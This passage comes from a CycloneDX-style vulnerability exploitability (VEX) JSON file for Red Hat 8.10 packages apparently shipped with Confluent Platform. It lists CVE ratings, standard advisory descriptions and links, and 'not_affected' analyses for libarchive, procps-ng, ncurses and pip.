          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-1000880",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        119
      ],
      "description": "libarchive version commit 9693801580c0cf7c70e862d305270a16b52826a7 onwards (release v3.2.0 onwards) contains a CWE-20: Improper Input Validation vulnerability in WARC parser - libarchive/archive_read_support_format_warc.c, _warc_read() that can result in DoS - quasi-infinite run time and disk usage from tiny file. This attack appear to be exploitable via the victim must open a specially crafted WARC file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1000880"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00055.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/106324"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1000880"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libarchive/+bug/1794909"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105/commits/9c84b7426660c09c18cc349f6d70b5f8168b5680"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBOCC2M6YGPZA6US43YK4INPSJZZHRTG/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W645KCLWFDBDGFJHG57WOVXGE62QSIJI/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVXA7PHINVT6DFF6PRLTDTVTXKDLVHNF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000880"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-3859-1"
        },
        {
          "url": "https://usn.ubuntu.com/3859-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1000880"
        },
        {
          "url": "https://www.debian.org/security/2018/dsa-4360"
        }
      ],
      "published": "2018-12-20T17:29:01+00:00",
      "updated": "2026-06-17T01:33:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-1121",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        367,
        362
      ],
      "description": "procps-ng, procps is vulnerable to a process hiding through race condition. Since the kernel's proc_pid_readdir() returns PID entries in ascending numeric order, a process occupying a high PID can use inotify events to determine when the process list is being scanned, and fork/exec to obtain a lower PID, thus avoiding enumeration. An unprivileged attacker can hide a process from procps-ng's utilities by exploiting a race condition in reading /proc/PID entries. This vulnerability affects procps and procps-ng up to version 3.3.15, newer versions might be affected also.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1121"
        },
        {
          "url": "http://seclists.org/oss-sec/2018/q2/122"
        },
        {
          "url": "http://www.securityfocus.com/bid/104214"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1121"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1121"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1121"
        },
        {
          "url": "https://www.exploit-db.com/exploits/44806/"
        },
        {
          "url": "https://www.qualys.com/2018/05/17/procps-ng-audit-report-advisory.txt"
        }
      ],
      "published": "2018-06-13T20:29:00+00:00",
      "updated": "2026-06-17T01:50:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.15-14.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2018-19211",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In ncurses 6.1, there is a NULL pointer dereference at function _nc_parse_entry in parse_entry.c that will lead to a denial of service attack. The product proceeds to the dereference code path even after a \"dubious character `*' in name or alias field\" detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-19211"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-19211"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1643754"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19211"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5477-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-19211"
        }
      ],
      "published": "2018-11-12T19:29:00+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-20225",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        20
      ],
      "description": "An issue was discovered in pip (all versions) because it installs the version with the highest version number, even if the user had intended to obtain a private package from a private index. This only affects use of the --extra-index-url option, and exploitation requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary version number). NOTE: it has been reported that this is intended functionality and the user is responsible for using --extra-index-url securely",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-20225"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-20225"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1835736"
        },
        {
          "url": "https://cowlicks.website/posts/arbitrary-code-execution-from-pips-extra-index-url.html"
        },
        {
